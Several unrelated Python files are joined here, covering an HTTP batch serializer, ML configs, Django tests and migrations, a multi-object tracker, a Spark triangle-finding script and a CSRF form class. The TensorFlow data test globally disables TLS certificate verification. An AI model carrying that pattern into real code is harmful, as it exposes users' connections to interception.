message = message_from_bytes(http_body) # type: Message
for raw_response in message.get_payload():
if raw_response.get_content_type() == "application/http":
yield self._deserialize_response(raw_response)
def _prepare_payload(self, query):
"""Serializes a batch request body.
:type query BatchQuery
"""
main_message = Message()
main_message.add_header("Content-Type", "multipart/mixed")
main_message.set_boundary(query.current_boundary)
if query.has_change_sets:
change_set_message = Message()
change_set_boundary = create_boundary("changeset_", True)
change_set_message.add_header("Content-Type", "multipart/mixed")
change_set_message.set_boundary(change_set_boundary)
for qry in query.change_sets:
request = qry.build_request()
message = self._serialize_request(request)
change_set_message.attach(message)
main_message.attach(change_set_message)
for qry in query.get_queries:
request = qry.build_request()
message = self._serialize_request(request)
main_message.attach(message)
return main_message
@staticmethod
def _normalize_headers(headers_raw):
headers = {}
for header_line in headers_raw:
k, v = header_line.split(":", 1)
headers[k] = v
return headers
def _deserialize_response(self, raw_response):
response = raw_response.get_payload(decode=True)
lines = list(filter(None, response.decode("utf-8").split("\r\n")))
response_status_regex = "^HTTP/1\\.\\d (\\d{3}) (.*)$"
status_result = re.match(response_status_regex, lines[0])
status_info = status_result.groups()
# validate for errors
if int(status_info[0]) >= 400:
raise ValueError(response)
if status_info[1] == "No Content" or len(lines) < 3:
headers_raw = lines[1:]
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": None
}
else:
*headers_raw, content = lines[1:]
content = json.loads(content)
return {
"status": status_info,
"headers": self._normalize_headers(headers_raw),
"content": content
}
@staticmethod
def _serialize_request(request):
"""Serializes a part of a batch request to a string. A part can be either a GET request or
a change set grouping several CUD (create, update, delete) requests.
:type request: RequestOptions
"""
eol = "\r\n"
method = request.method
if "X-HTTP-Method" in request.headers:
method = request.headers["X-HTTP-Method"]
lines = ["{method} {url} HTTP/1.1".format(method=method, url=request.url),
*[':'.join(h) for h in request.headers.items()]]
if request.data:
lines.append(eol)
lines.append(json.dumps(request.data))
buffer = eol + eol.join(lines) + eol
payload = buffer.encode('utf-8').lstrip()
message = Message()
message.add_header("Content-Type", "application/http")
message.add_header("Content-Transfer-Encoding", "binary")
message.set_payload(payload)
return message
|
from setuptools import setup, find_packages
from setuptools.command.test import test as TestCommand
import os, sys
# From here: http://pytest.org/2.2.4/goodpractises.html
class RunTests(TestCommand):
DIRECTORY = 'test'
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = [self.DIRECTORY]
self.test_suite = True
def run_tests(self):
# Import here, because outside the eggs aren't loaded.
import pytest
errno = pytest.main(self.test_args)
if errno:
raise SystemExit(errno)
def _version():
with open('streamy.py') as fp:
line = next(i for i in fp if i.startswith('__version__'))
return line.strip().split()[-1].strip("'")
NAME = 'streamy'
OWNER = 'timedata-org'
VERSION = _version()
URL = 'http://github.com/{OWNER}/{NAME}'.format(**locals())
DOWNLOAD_URL = '{URL}/archive/{VERSION}.tar.gz'.format(**locals())
if __name__ == '__main__':
setup(
name='streamy',
version=_version(),
description=('streamy splits a stream into a stream of strings that are'
' complete JSON expressions'),
author='Tom Ritchford',
author_email='tom@swirly.com',
url=URL,
download_url=DOWNLOAD_URL,
license='MIT',
packages=find_packages(exclude=['test']),
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
],
tests_require=[],
cmdclass={'test': RunTests},
keywords=['git', 'import'],
include_package_data=True,
install_requires=[],
)
|
voxel_size = [0.05, 0.05, 0.1]
model = dict(
type='VoxelNet',
voxel_layer=dict(max_num_points=5,
point_cloud_range=[0, -40, -3, 70.4, 40, 1],
voxel_size=voxel_size,
max_voxels=(16000, 40000)),
voxel_encoder=dict(type='HardSimpleVFE'),
middle_encoder=dict(type='SparseEncoder',
in_channels=4,
sparse_shape=[41, 1600, 1408],
order=('conv', 'norm', 'act')),
backbone=dict(type='SECOND',
in_channels=256,
layer_nums=[5, 5],
layer_strides=[1, 2],
out_channels=[128, 256]),
neck=dict(type='SECONDFPN',
in_channels=[128, 256],
upsample_strides=[1, 2],
out_channels=[256, 256]),
bbox_head=dict(type='Anchor3DHead',
num_classes=3,
in_channels=512,
feat_channels=512,
use_direction_classifier=True,
anchor_generator=dict(
type='Anchor3DRangeGenerator',
ranges=[
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -0.6, 70.4, 40.0, -0.6],
[0, -40.0, -1.78, 70.4, 40.0, -1.78],
],
sizes=[[0.6, 0.8, 1.73], [0.6, 1.76, 1.73],
[1.6, 3.9, 1.56]],
rotations=[0, 1.57],
reshape_out=False),
diff_rad_by_sin=True,
bbox_coder=dict(type='DeltaXYZWLHRBBoxCoder'),
loss_cls=dict(type='FocalLoss',
use_sigmoid=True,
gamma=2.0,
alpha=0.25,
loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss',
beta=1.0 / 9.0,
loss_weight=2.0),
loss_dir=dict(type='CrossEntropyLoss',
use_sigmoid=False,
loss_weight=0.2)),
# model training and testing settings
train_cfg=dict(
assigner=[
dict( # for Pedestrian
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Cyclist
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.35,
neg_iou_thr=0.2,
min_pos_iou=0.2,
ignore_iof_thr=-1),
dict( # for Car
type='MaxIoUAssigner',
iou_calculator=dict(type='BboxOverlapsNearest3D'),
pos_iou_thr=0.6,
neg_iou_thr=0.45,
min_pos_iou=0.45,
ignore_iof_thr=-1),
],
allowed_border=0,
pos_weight=-1,
debug=False),
test_cfg=dict(use_rotate_nms=True,
nms_across_levels=False,
nms_thr=0.01,
score_thr=0.1,
min_bbox_size=0,
nms_pre=100,
max_num=50))
|
import time
from pycspr.api.get_block import execute as get_block
def execute(
polling_interval_seconds: float = 1.0,
max_polling_time_seconds: float = 120.0
) -> dict:
"""Returns last finialised block in current era.
:param polling_interval_seconds: Time interval time (in seconds) before polling for next switch block.
:param max_polling_time_seconds: Maximum time in seconds to poll.
:returns: On-chain block information.
"""
elapsed = 0.0
while True:
block = get_block()
if block["header"]["era_end"] is not None:
return block
elapsed += polling_interval_seconds
if elapsed > max_polling_time_seconds:
break
time.sleep(polling_interval_seconds)
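
# Minimal usage sketch (illustrative only; assumes a node connection has been
# configured for pycspr elsewhere). Note that if polling times out, the loop
# above falls through and the function implicitly returns None.
if __name__ == '__main__':
    switch_block = execute(polling_interval_seconds=2.0,
                           max_polling_time_seconds=60.0)
    if switch_block is None:
        print('Timed out waiting for a switch block.')
    else:
        print('Era end info:', switch_block['header']['era_end'])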
|
# -*- coding: utf-8 -*-
#
"""
Unit tests for data related operations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
import copy
import shutil
import tempfile
import ssl
import tensorflow as tf
import texar.tf as tx
ssl._create_default_https_context = ssl._create_unverified_context
class TFRecordDataTest(tf.test.TestCase):
"""Tests tfrecord data class.
"""
# pylint: disable=too-many-locals
def setUp(self):
tf.test.TestCase.setUp(self)
# Create test data
# pylint: disable=no-member
self._test_dir = tempfile.mkdtemp()
cat_in_snow = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'cat_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/320px-Felis_catus-cat_on_snow.jpg')
williamsburg_bridge = tf.keras.utils.get_file(
os.path.join(self._test_dir, 'bridge_0.jpg'),
'https://storage.googleapis.com/download.tensorflow.org/'
'example_images/194px-New_East_River_Bridge_from_Brooklyn_'
'det.4a09796u.jpg')
def _bytes_feature(value=None):
"""Returns a bytes_list from a string / byte.
"""
# pylint: disable=undefined-loop-variable
value = tf.compat.as_bytes(
value,
encoding='utf-8'
)
return tf.train.Feature(
bytes_list=tf.train.BytesList(value=[value]))
def _int64_feature(value=None):
"""Returns an int64_list from a bool / enum / int / uint.
"""
return tf.train.Feature(
int64_list=tf.train.Int64List(value=[value]))
_feature_original_types = {
'height': ['tf.int64', 'FixedLenFeature'],
'width': ['tf.int64', 'FixedLenFeature'],
'label': ['tf.int64', 'FixedLenFeature'],
'shape': [tf.int64, 'VarLenFeature'],
'image_raw': ['tf.string', 'FixedLenFeature'],
'variable1': [tf.string, 'FixedLenFeature'],
'variable2': ['tf.int64', 'FixedLenFeature'],
}
self._feature_convert_types = {
'variable1': 'tf.float32',
'variable2': 'tf.string',
}
_image_options = {}
self._unconvert_features = ['height', 'width', 'label']
def _image_example(image_string, image_shape, label):
"""Create data example with image
"""
feature = {
'height': _int64_feature(image_shape[0]),
'width': _int64_feature(image_shape[1]),
'shape': tf.train.Feature(
int64_list=tf.train.Int64List(value=list(image_shape))),
'label': _int64_feature(label),
'image_raw': _bytes_feature(image_string),
'variable1': _bytes_feature('1234567890'),
'variable2': _int64_feature(9876543210),
}
return tf.train.Example(
features=tf.train.Features(feature=feature))
self._dataset_valid = {
'height': [],
'width': [],
'shape': [],
'label': [],
'image_raw': [],
'variable1': [],
'variable2': [],
}
_toy_image_labels_valid = {
cat_in_snow : 0,
williamsburg_bridge : 1,
}
_toy_image_shapes = {
cat_in_snow: (213, 320, 3),
williamsburg_bridge: (239, 194),
}
_tfrecord_filepath = os.path.join(
self._test_dir,
'test.tfrecord')
# Prepare Validation data
with tf.python_io.TFRecordWriter(_tfrecord_filepath) as writer:
for image_path, label in _toy_image_labels_valid.items():
with open(image_path, 'rb') as fid:
image_data = fid.read()
image_shape = _toy_image_shapes[image_path]
tf_example = _image_example(image_data, image_shape, label)
writer.write(tf_example.SerializeToString())
#_construct_dataset_valid("", shape, label)
single_data = {
'height': image_shape[0],
'width': image_shape[1],
'shape': image_shape,
'label': label,
'image_raw': image_data,
'variable1': "1234567890",
'variable2': int(9876543210),
}
for key, value in single_data.items():
self._dataset_valid[key].append(value)
self._hparams = {
"num_epochs": 1,
"batch_size": 1,
"shuffle": False,
"dataset": {
"files": _tfrecord_filepath,
"feature_original_types": _feature_original_types,
"feature_convert_types": self._feature_convert_types,
"image_options": [_image_options],
}
}
def tearDown(self):
"""Remove the downloaded files after the test
"""
shutil.rmtree(self._test_dir)
def _run_and_test(self, hparams):
# Construct database
tfrecord_data = tx.data.TFRecordData(hparams)
iterator = tfrecord_data.dataset.make_initializable_iterator()
data_batch = iterator.get_next()
with self.test_session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.local_variables_initializer())
sess.run(tf.tables_initializer())
sess.run(iterator.initializer)
i = 0
def _prod(lst):
res = 1
for i in lst:
res *= i
return res
while True:
try:
# Run the logics
data_batch_ = sess.run(data_batch)
self.assertEqual(
set(data_batch_.keys()),
set(tfrecord_data.list_items()))
# Check data consistency
for key in self._unconvert_features:
value = data_batch_[key][0]
self.assertEqual(value, self._dataset_valid[key][i])
self.assertEqual(
list(data_batch_['shape'].values),
list(self._dataset_valid['shape'][i]))
# Check data type conversion
for key, item in self._feature_convert_types.items():
value = data_batch_[key][0]
if item == 'tf.string' or item is tf.string:
self.assertTrue(isinstance(value, bytes))
else:
dtype_matched = (
tx.utils.dtypes.get_tf_dtype(str(value.dtype))
is tx.utils.dtypes.get_tf_dtype(item))
self.assertTrue(dtype_matched)
# Check image decoding and resize
if hparams["dataset"].get("image_options"):
image_options = hparams["dataset"].get("image_options")
if isinstance(image_options, dict):
image_options = [image_options]
for image_option_feature in image_options:
image_key = image_option_feature.get(
"image_feature_name")
if image_key is None:
continue
image_gen = data_batch_[image_key][0]
image_valid_shape = self._dataset_valid["shape"][i]
resize_height = image_option_feature.get(
"resize_height")
resize_width = image_option_feature.get(
"resize_width")
if resize_height and resize_width:
self.assertEqual(
image_gen.shape[0] * image_gen.shape[1],
resize_height * resize_width)
else:
self.assertEqual(
_prod(image_gen.shape),
_prod(image_valid_shape))
i += 1
except tf.errors.OutOfRangeError:
print('Done -- epoch limit reached')
break
def test_default_setting(self):
"""Tests the logics of TFRecordData.
"""
self._run_and_test(self._hparams)
def test_image_resize(self):
"""Tests the image resize function
"""
hparams = copy.copy(self._hparams)
_image_options = {
'image_feature_name': 'image_raw',
'resize_height': 512,
'resize_width': 512,
}
hparams["dataset"].update({"image_options": _image_options})
self._run_and_test(hparams)
if __name__ == "__main__":
tf.test.main()
|
people = int(input())
presentation = ""
total_score = 0
total_average = 0
count_presentation = 0
while True:
command = input()
if command == "Finish":
break
presentation = command
score = 0
count_presentation += 1
for i in range(0, people):
score += float(input())
average_score = score / people
total_score += average_score
print(f"{presentation} - {average_score:.2f}.")
total_average = total_score / count_presentation
print(f"Student's final assessment is {total_average:.2f}.")
|
import os
from django.contrib.gis.utils import LayerMapping
from liveapp.models import Town
town_mapping = {
'town_name': 'Town_Name',
'town_type': 'Town_Type',
'geom': 'MULTIPOINT',
}
town_shp = os.path.abspath(os.path.join(os.path.dirname(__file__), 'data/subcounty', 'towns.shp'),)
def run(verbose=True):
lm = LayerMapping(
Town, town_shp, town_mapping,
transform=False, encoding='iso-8859-1',
)
lm.save(strict=True, verbose=verbose)
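
# Usage note (an assumption about project layout, not from the original file):
# loader scripts like this are typically run from a Django shell, e.g.
#   python manage.py shell
#   >>> from <path.to.this.module> import run
#   >>> run()
# where <path.to.this.module> stands for wherever this file lives in the project.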
|
"""
Python <= 3.4 compat for singledispatch.
"""
from sys import version_info
if (version_info.major, version_info.minor) < (3, 4): # pragma: no cover
from singledispatch import singledispatch
else: # pragma: no cover
from functools import singledispatch
__all__ = ['singledispatch']
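
# Minimal usage sketch (illustrative, not part of the compat shim): whichever
# implementation is imported above, it dispatches on the type of the first
# positional argument.
if __name__ == '__main__':  # pragma: no cover
    @singledispatch
    def describe(value):
        return 'something else'

    @describe.register(int)
    def _describe_int(value):
        return 'an int'

    assert describe(3) == 'an int'
    assert describe('x') == 'something else'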
|
# vim: expandtab:ts=4:sw=4
from __future__ import absolute_import
import numpy as np
from . import kalman_filter
from . import linear_assignment
from . import iou_matching
from .track import Track
class Tracker:
"""
This is the multi-target tracker.
Parameters
----------
metric : nn_matching.NearestNeighborDistanceMetric
A distance metric for measurement-to-track association.
max_age : int
        Maximum number of consecutive misses before a track is deleted.
n_init : int
Number of consecutive detections before the track is confirmed. The
track state is set to `Deleted` if a miss occurs within the first
`n_init` frames.
Attributes
----------
metric : nn_matching.NearestNeighborDistanceMetric
The distance metric used for measurement to track association.
max_age : int
        Maximum number of consecutive misses before a track is deleted.
n_init : int
Number of frames that a track remains in initialization phase.
kf : kalman_filter.KalmanFilter
A Kalman filter to filter target trajectories in image space.
tracks : List[Track]
The list of active tracks at the current time step.
"""
def __init__(self, metric, max_iou_distance=0.7, max_age=70, n_init=3, h = np.identity(3, float)):
self.metric = metric
self.max_iou_distance = max_iou_distance
self.max_age = max_age
self.n_init = n_init
self.kf = kalman_filter.KalmanFilter()
self.tracks = []
self._next_id = 1
self.H = h
def predict(self):
"""Propagate track state distributions one time step forward.
This function should be called once every time step, before `update`.
"""
for track in self.tracks:
track.predict(self.kf)
def update(self, detections, h=np.identity(3)):
"""Perform measurement update and track management.
Parameters
----------
detections : List[deep_sort.detection.Detection]
A list of detections at the current time step.
"""
# Run matching cascade.
matches, unmatched_tracks, unmatched_detections = \
self._match(detections)
# Update track set.
for track_idx, detection_idx in matches:
self.tracks[track_idx].update(
self.kf, detections[detection_idx])
for track_idx in unmatched_tracks:
self.tracks[track_idx].mark_missed()
for detection_idx in unmatched_detections:
self._initiate_track(detections[detection_idx])
self.tracks = [t for t in self.tracks if not t.is_deleted()]
# Update distance metric.
active_targets = [t.track_id for t in self.tracks if t.is_confirmed()]
features, targets = [], []
for track in self.tracks:
if not track.is_confirmed():
continue
features += track.features
targets += [track.track_id for _ in track.features]
track.features = []
self.metric.partial_fit(
np.asarray(features), np.asarray(targets), active_targets)
def _match(self, detections):
def gated_metric(tracks, dets, track_indices, detection_indices):
features = np.array([dets[i].feature for i in detection_indices])
targets = np.array([tracks[i].track_id for i in track_indices])
cost_matrix = self.metric.distance(features, targets)
print("cost_matrix1:\n", cost_matrix)
cost_matrix = linear_assignment.gate_cost_matrix(
self.kf, cost_matrix, tracks, dets, track_indices,
detection_indices, only_position=True)
print("cost_matrix2:\n", cost_matrix)
return cost_matrix
# Split track set into confirmed and unconfirmed tracks.
confirmed_tracks = [
i for i, t in enumerate(self.tracks) if t.is_confirmed()]
unconfirmed_tracks = [
i for i, t in enumerate(self.tracks) if not t.is_confirmed()]
# Associate confirmed tracks using appearance features.
matches_a, unmatched_tracks_a, unmatched_detections = \
linear_assignment.matching_cascade(
gated_metric, self.metric.matching_threshold, self.max_age,
self.tracks, detections, confirmed_tracks)
# Associate remaining tracks together with unconfirmed tracks using IOU.
iou_track_candidates = unconfirmed_tracks + [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update == 1]
unmatched_tracks_a = [
k for k in unmatched_tracks_a if
self.tracks[k].time_since_update != 1]
matches_b, unmatched_tracks_b, unmatched_detections = \
linear_assignment.min_cost_matching(
iou_matching.iou_cost, self.max_iou_distance, self.tracks,
detections, iou_track_candidates, unmatched_detections)
matches = matches_a + matches_b
unmatched_tracks = list(set(unmatched_tracks_a + unmatched_tracks_b))
return matches, unmatched_tracks, unmatched_detections
def _initiate_track(self, detection):
mean, covariance = self.kf.initiate(detection.to_toppoint())
self.tracks.append(Track(
mean, covariance, self._next_id, self.n_init, self.max_age,
detection.feature, h=self.H))
self._next_id += 1
|
"""
To understand why this file is here, please read:
http://cookiecutter-django.readthedocs.io/en/latest/faq.html#why-is-there-a-django-contrib-sites-directory-in-cookiecutter-django
"""
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations
def update_site_forward(apps, schema_editor):
"""Set site domain and name."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'crewbank.io',
'name': 'CrewBank'
}
)
def update_site_backward(apps, schema_editor):
"""Revert site domain and name to default."""
Site = apps.get_model('sites', 'Site')
Site.objects.update_or_create(
id=settings.SITE_ID,
defaults={
'domain': 'example.com',
'name': 'example.com'
}
)
class Migration(migrations.Migration):
dependencies = [
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.RunPython(update_site_forward, update_site_backward),
]
|
from django.test import TestCase, Client
from django.contrib.auth import get_user_model
from django.urls import reverse
class AdminSiteTests(TestCase):
def setUp(self):
self.client = Client()
self.admin_user = get_user_model().objects.create_superuser(
email="admin@test.com",
password="test123"
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email="test@test.com",
password="test123",
name="Test User"
)
def test_users_listed(self):
"""Test if the user listed on the user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.name)
self.assertContains(res, self.user.email)
def test_user_change_page(self):
"""Test that the user edit page works"""
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
"""Test that the create user page works"""
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
|
from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse
def index(request):
# return HttpResponse("Hello, world. You're at the polls index.")
return render(request, 'login/index.html')
|
import logging
class BaseResponseHandler:
def on_execution(self, event):
logging.debug(event)
return event
def on_exception(self, ex):
logging.exception(str(ex))
raise
def on_response(self, response):
logging.debug(response)
return response
|
from pyspark import SparkContext
import sys
import time
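# Input format note (inferred from the parsing below, stated as an assumption):
# each line of the input CSV is expected to be "src,dst,probability",
# e.g. "a,b,0.5", giving an undirected edge with an existence probability.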
# Put node with smaller id as src of edge and node with bigger id as dst.
def reOrderingSrcAndDstOfEgde(x:list)-> tuple:
src = x[0]
dst = x[1]
probability = x[2]
if src < dst:
return (src,(dst,probability))
else:
return (dst,(src,probability))
# Find which edges must exist to create triangles based on a specific node.
# Also returns all the already existing edges.
def findEdgesToSearchToCalculateAllTriangles(node:str, listOfEdges:list)-> list:
listOfEdges.sort(key= lambda x: x[0])
edgesToSearchAndEdgesThatExist = list()
for index,edge in enumerate(listOfEdges):
dstNode = edge[0]
edge_probability = edge[1]
edgesToSearchAndEdgesThatExist.append( ((node,dstNode), (edge_probability,"-1")) ) # The edges that exist. The "-1" is a flag that shows that this edge exist
for edge2 in listOfEdges[index + 1:]: # Calculate all the edges that are need to create triangles with basis this node
# The value "X" is dummy and is need in order to have the same structure in all key-value pairs
# The node in the key-value pair shows which node needs this edge to create a triangle
edgesToSearchAndEdgesThatExist.append( ((dstNode,edge2[0]), ("X",node)) )
return edgesToSearchAndEdgesThatExist
# Return the searched edges that exist to the nodes that need them to form triangles.
# Also return the existing edges to the node from which they were extracted.
def returnTheSearchedEdgesThatExist(edge:tuple, listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles:list)-> tuple:
    listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles.sort(key= lambda x: x[1]) # put the key-value pair that shows whether the edge exists first in the list
edgesToReturn = list()
if listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][1] == "-1": # Edge exist in the graph
edgeProbability = listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[0][0]
edgesToReturn.append( (edge[0],(edge,edgeProbability)) )
for keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle in listThatShowsIfEdgeExistAndShowsNodesThatNeedEdgeToCreateTriangles[1:]:
edgesToReturn.append( (keyValuePairThatShowsWhichNodeNeedTheEdgeToCreateTriangle[1], (edge,edgeProbability)) )
return edgesToReturn
else: # Edge doesn't exist in the graph
return edgesToReturn # edgesToReturn = []
# Finds the triangles that exist with basis a node and their probabilities
def calculateTriangles(node, listOfEdges:list)-> list:
listOfEdges.sort(reverse=True,key= lambda x: x[0][0])
edges_dic = dict((key,value) for key, value in listOfEdges)
trianglesThatExist = list()
for edge1 in listOfEdges:
        if edge1[0][0] > node: # a triangle exists with this node as its basis
edge2 = (node,edge1[0][0])
edge3 = (node,edge1[0][1])
triangleName = node + "," + edge1[0][0] + "," + edge1[0][1]
triangleProbability = float(edges_dic[edge1[0]]) * float(edges_dic[edge2]) * float(edges_dic[edge3])
trianglesThatExist.append((triangleName,triangleProbability))
        else: # no triangle exists with this node as its basis
break
return trianglesThatExist
def main(TopK:str):
sc = SparkContext(appName="Top-k most probable triangles")
# edgesRDD = sc.textFile("./input/ex.csv")
# edgesRDD = sc.textFile("./input/collins.csv")
# edgesRDD = sc.textFile("./input/ex_exploit_bug.csv")
edgesRDD = sc.textFile("./input/artists_uniform.csv")
# artists_uniform.csv, artists_normal.csv, artists_power_law.csv
trianglesRDD = edgesRDD \
.map(lambda x: x.split(",")) \
.map(lambda x: reOrderingSrcAndDstOfEgde(x)) \
.groupByKey() \
.flatMap(lambda x: findEdgesToSearchToCalculateAllTriangles(x[0],list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: returnTheSearchedEdgesThatExist(x[0], list(x[1]))) \
.groupByKey() \
.flatMap(lambda x: calculateTriangles(x[0], list(x[1]))) \
.sortBy(lambda x: x[1], ascending=False) \
.take(int(TopK))
# .count()
# print(trianglesRDD)
# for triangle in trianglesRDD:
# print(triangle)
sc.stop()
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Give k as input")
sys.exit()
start = time.time()
main(sys.argv[1])
end = time.time()
print("Execution time : " + str(end - start))
|
from __future__ import unicode_literals
from wtforms.form import Form
from wtforms.validators import ValidationError
from .fields import CSRFTokenField
class SecureForm(Form):
"""
Form that enables CSRF processing via subclassing hooks.
"""
csrf_token = CSRFTokenField()
def __init__(self, formdata=None, obj=None, prefix="", csrf_context=None, **kwargs):
"""
:param csrf_context:
Optional extra data which is passed transparently to your
CSRF implementation.
"""
super(SecureForm, self).__init__(formdata, obj, prefix, **kwargs)
self.csrf_token.current_token = self.generate_csrf_token(csrf_context)
def generate_csrf_token(self, csrf_context):
"""
Implementations must override this to provide a method with which one
can get a CSRF token for this form.
A CSRF token should be a string which can be generated
deterministically so that on the form POST, the generated string is
(usually) the same assuming the user is using the site normally.
:param csrf_context:
A transparent object which can be used as contextual info for
generating the token.
"""
raise NotImplementedError()
def validate_csrf_token(self, field):
"""
Override this method to provide custom CSRF validation logic.
The default CSRF validation logic simply checks if the recently
generated token equals the one we received as formdata.
"""
if field.current_token != field.data:
raise ValidationError(field.gettext("Invalid CSRF Token"))
@property
def data(self):
d = super(SecureForm, self).data
d.pop("csrf_token")
return d
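
# Hedged sketch of a concrete subclass (illustrative only; the way the token
# is derived from csrf_context below is an assumption, not part of wtforms):
if __name__ == '__main__':  # pragma: no cover
    import hashlib

    class ExampleSecureForm(SecureForm):
        def generate_csrf_token(self, csrf_context):
            # Derive a deterministic token from some per-session secret
            # carried in csrf_context (hypothetical contract).
            secret = str(csrf_context or 'example-secret')
            return hashlib.sha256(secret.encode('utf-8')).hexdigest()

    form = ExampleSecureForm(csrf_context='session-1234')
    print(form.csrf_token.current_token)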
|
import csv
import json
import os
import shutil
from collections import defaultdict
import numpy as np
import torch
import torchvision
from termcolor import colored
from torch.utils.tensorboard import SummaryWriter
COMMON_TRAIN_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float'),
('duration', 'D', 'time')]
COMMON_EVAL_FORMAT = [('episode', 'E', 'int'), ('step', 'S', 'int'),
('episode_reward', 'R', 'float')]
AGENT_TRAIN_FORMAT = {
'drq': [('batch_reward', 'BR', 'float'), ('actor_loss', 'ALOSS', 'float'),
('critic_loss', 'CLOSS', 'float'),
('alpha_loss', 'TLOSS', 'float'), ('alpha_value', 'TVAL', 'float'),
('actor_entropy', 'AENT', 'float')]
}
class AverageMeter(object):
def __init__(self):
self._sum = 0
self._count = 0
def update(self, value, n=1):
self._sum += value
self._count += n
def value(self):
return self._sum / max(1, self._count)
class MetersGroup(object):
def __init__(self, file_name, formating):
self._csv_file_name = self._prepare_file(file_name, 'csv')
self._formating = formating
self._meters = defaultdict(AverageMeter)
self._csv_file = open(self._csv_file_name, 'w')
self._csv_writer = None
def _prepare_file(self, prefix, suffix):
file_name = f'{prefix}.{suffix}'
if os.path.exists(file_name):
os.remove(file_name)
return file_name
def log(self, key, value, n=1):
self._meters[key].update(value, n)
def _prime_meters(self):
data = dict()
for key, meter in self._meters.items():
if key.startswith('train'):
key = key[len('train') + 1:]
else:
key = key[len('eval') + 1:]
key = key.replace('/', '_')
data[key] = meter.value()
return data
def _dump_to_csv(self, data):
if self._csv_writer is None:
self._csv_writer = csv.DictWriter(self._csv_file,
fieldnames=sorted(data.keys()),
restval=0.0)
self._csv_writer.writeheader()
self._csv_writer.writerow(data)
self._csv_file.flush()
def _format(self, key, value, ty):
if ty == 'int':
value = int(value)
return f'{key}: {value}'
elif ty == 'float':
return f'{key}: {value:.04f}'
elif ty == 'time':
return f'{key}: {value:04.1f} s'
else:
            raise ValueError(f'invalid format type: {ty}')
def _dump_to_console(self, data, prefix):
prefix = colored(prefix, 'yellow' if prefix == 'train' else 'green')
pieces = [f'| {prefix: <14}']
for key, disp_key, ty in self._formating:
value = data.get(key, 0)
pieces.append(self._format(disp_key, value, ty))
print(' | '.join(pieces))
def dump(self, step, prefix, save=True):
if len(self._meters) == 0:
return
if save:
data = self._prime_meters()
data['step'] = step
self._dump_to_csv(data)
self._dump_to_console(data, prefix)
self._meters.clear()
class Logger(object):
def __init__(self,
log_dir,
save_tb=False,
log_frequency=10000,
action_repeat=1,
agent='drq'):
self._log_dir = log_dir
self._log_frequency = log_frequency
self._action_repeat = action_repeat
if save_tb:
tb_dir = os.path.join(log_dir, 'tb')
if os.path.exists(tb_dir):
try:
shutil.rmtree(tb_dir)
except:
print("logger.py warning: Unable to remove tb directory")
pass
self._sw = SummaryWriter(tb_dir)
else:
self._sw = None
# each agent has specific output format for training
assert agent in AGENT_TRAIN_FORMAT
train_format = COMMON_TRAIN_FORMAT + AGENT_TRAIN_FORMAT[agent]
self._train_mg = MetersGroup(os.path.join(log_dir, 'train'),
formating=train_format)
self._eval_mg = MetersGroup(os.path.join(log_dir, 'eval'),
formating=COMMON_EVAL_FORMAT)
def _should_log(self, step, log_frequency):
log_frequency = log_frequency or self._log_frequency
return step % log_frequency == 0
def _update_step(self, step):
return step * self._action_repeat
def _try_sw_log(self, key, value, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_scalar(key, value, step)
def _try_sw_log_image(self, key, image, step):
step = self._update_step(step)
if self._sw is not None:
assert image.dim() == 3
grid = torchvision.utils.make_grid(image.unsqueeze(1))
self._sw.add_image(key, grid, step)
def _try_sw_log_video(self, key, frames, step):
step = self._update_step(step)
if self._sw is not None:
frames = torch.from_numpy(np.array(frames))
frames = frames.unsqueeze(0)
self._sw.add_video(key, frames, step, fps=30)
def _try_sw_log_histogram(self, key, histogram, step):
step = self._update_step(step)
if self._sw is not None:
self._sw.add_histogram(key, histogram, step)
def log(self, key, value, step, n=1, log_frequency=1):
if not self._should_log(step, log_frequency):
return
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def eval_log(self, key, value, step, n=1, log_frequency=1):
"""Same as self.log(), except we don't call self._should_log().
In other words, we always log."""
assert key.startswith('train') or key.startswith('eval')
if type(value) == torch.Tensor:
value = value.item()
self._try_sw_log(key, value / n, step)
mg = self._train_mg if key.startswith('train') else self._eval_mg
mg.log(key, value, n)
def log_param(self, key, param, step, log_frequency=None):
